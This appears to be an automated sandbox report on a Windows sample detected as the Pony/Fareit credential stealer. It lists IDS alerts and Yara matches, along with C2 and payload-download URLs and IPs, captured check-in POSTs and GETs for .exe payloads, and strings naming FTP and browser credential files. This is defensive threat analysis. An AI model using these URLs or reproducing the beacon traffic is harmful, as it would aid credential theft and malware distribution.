Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49730 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49732 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49731 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49731 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49741 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49732 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49732 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49730 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49758 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49731 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49731 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49742 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49741 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49732 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.4:49877 -> 104.21.17.37:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49741 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49746 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49744 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49744 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49742 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49746 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49744 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49742 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49742 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49877 -> 104.21.17.37:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49746 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49744 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49746 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.4:49881 -> 188.114.97.6:443
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49881 -> 188.114.97.6:443
Source: Network traffic	Suricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.4:49883 -> 72.32.185.12:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49883 -> 72.32.185.12:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://dynamotouren.de/4XM2f.exe
Source: Malware configuration extractor	URLs: http://208.116.13.164/b6dK7rwV.exe
Source: Malware configuration extractor	URLs: http://app.bi.com.tr/fPFa.exe
Source: Malware configuration extractor	URLs: http://www.aboessen24.de/WWkULwkq.exe
Source: Malware configuration extractor	URLs: http://72.32.185.12/rd7nr.exe
Source: Malware configuration extractor	URLs: http://6.magicalomaha.co/forum/viewtopic.php
Source: Malware configuration extractor	URLs: http://www.seigner-art.at/fPsx8i.exe
Source: Malware configuration extractor	URLs: http://6.magicalomaha.com/forum/viewtopic.php

Source: Joe Sandbox View	IP Address: 188.114.97.6 188.114.97.6
Source: Joe Sandbox View	IP Address: 188.114.97.6 188.114.97.6
Source: Joe Sandbox View	IP Address: 208.91.197.44 208.91.197.44

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: RMH-14US RMH-14US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: /Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /4XM2f.exe HTTP/1.0Host: dynamotouren.deAccept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /?dynamotouren.de HTTP/1.0Host: www.dynamotouren.comAccept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /rd7nr.exe HTTP/1.0Host: 72.32.185.12Accept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: unknown	TCP traffic detected without corresponding DNS query: 72.32.185.12
Source: unknown	TCP traffic detected without corresponding DNS query: 72.32.185.12
Source: unknown	TCP traffic detected without corresponding DNS query: 72.32.185.12
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_00403771 recv,

0_2_00403771

Source: global traffic	HTTP traffic detected: GET /4XM2f.exe HTTP/1.0Host: dynamotouren.deAccept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /?dynamotouren.de HTTP/1.0Host: www.dynamotouren.comAccept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /rd7nr.exe HTTP/1.0Host: 72.32.185.12Accept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: global traffic	DNS traffic detected: DNS query: 6.magicalomaha.co
Source: global traffic	DNS traffic detected: DNS query: 6.magicalomaha.com
Source: global traffic	DNS traffic detected: DNS query: dynamotouren.de
Source: global traffic	DNS traffic detected: DNS query: www.dynamotouren.com
Source: global traffic	DNS traffic detected: DNS query: app.bi.com.tr

Source: unknown

HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://208.116.13.164/b6dK7rwV.exe
Source: 8WgZHDQckx.exe, 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://6.magicalomaha.co/forum/viewtopic.php
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://6.magicalomaha.co/forum/viewtopic.phphttp://6.magicalomaha.com/forum/viewtopic.phphttp://dyna
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://6.magicalomaha.com/forum/viewtopic.php
Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://6.magicalomaha.com/forum/viewtopic.phpR
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.32.185.12/rd7nr.exe
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app.bi.com.tr/fPFa.exe
Source: 8WgZHDQckx.exe, 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://dynamotouren.de/4XM2f.exe
Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dynamotouren.de/4XM2f.exeT5C5
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.aboessen24.de/WWkULwkq.exe
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.seigner-art.at/fPsx8i.exe
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dynamotouren.com/?dynamotouren.de
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443

E-Banking Fraud

Yara detected Pony

Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_00402D3E		0_2_00402D3E
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_00411EE9		0_2_00411EE9

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: String function: 00410514 appears 40 times
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: String function: 00404192 appears 50 times
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: String function: 00401BB8 appears 139 times

Source: 8WgZHDQckx.exe, 00000000.00000000.1678185277.0000000000466000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLCWIZ.EXET vs 8WgZHDQckx.exe
Source: 8WgZHDQckx.exe	Binary or memory string: OriginalFilenameLCWIZ.EXET vs 8WgZHDQckx.exe

Source: 8WgZHDQckx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
